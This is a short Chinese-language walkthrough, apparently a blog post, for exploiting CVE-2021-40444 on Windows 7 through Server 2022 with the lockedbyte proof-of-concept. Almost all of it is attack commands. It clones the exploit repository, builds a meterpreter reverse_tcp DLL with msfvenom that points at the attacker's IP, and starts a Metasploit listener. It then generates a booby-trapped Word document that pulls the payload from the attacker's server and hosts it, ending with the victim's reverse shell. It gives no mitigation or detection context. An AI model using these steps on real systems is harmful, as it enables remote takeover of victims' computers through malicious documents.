前言
通过lockedbyte/CVE-2021-40444实现远程代码执行漏洞利用
漏洞利用前提
- Windows 7
- Windows 8
- Windows 8.1
- Windows 10
- Windows Server 2008
- Windows Server 2008R2
- Windows Server 2012
- Windows Server 2012R2
- Windows Server 2016
- Windows Server 2019
- Windows Server 2022
下载依赖
Linux
Debian
下载项目
1 2
| git clone https://github.com/lockedbyte/CVE-2021-40444.git cd CVE-2021-40444
|
攻击者生成木马并监听端口
msf
dll
<ip>:攻击者IP地址
<port>:攻击者msf监听的端口号
1
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f dll -o x.dll
|
监听反弹Shell
<port>:攻击者msf监听的端口号
1 2 3 4 5 6
| msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 0.0.0.0 msf exploit(multi/handler) > set lport <port> msf exploit(multi/handler) > run
|
攻击者生成包含恶意代码的文档
x.dll:上一步骤生成的dll木马
<ip>:攻击者IP地址
<port>:攻击者监听文档请求的端口号
1
| python3 exploit.py generate x.dll http://<ip>:<port>
|
- 在
out目录下生成Word文档document.docx
攻击者监听文档请求
<port>:攻击者监听文档请求的端口号
1
| python3 exploit.py host <port>
|
受害者反弹Shell
完成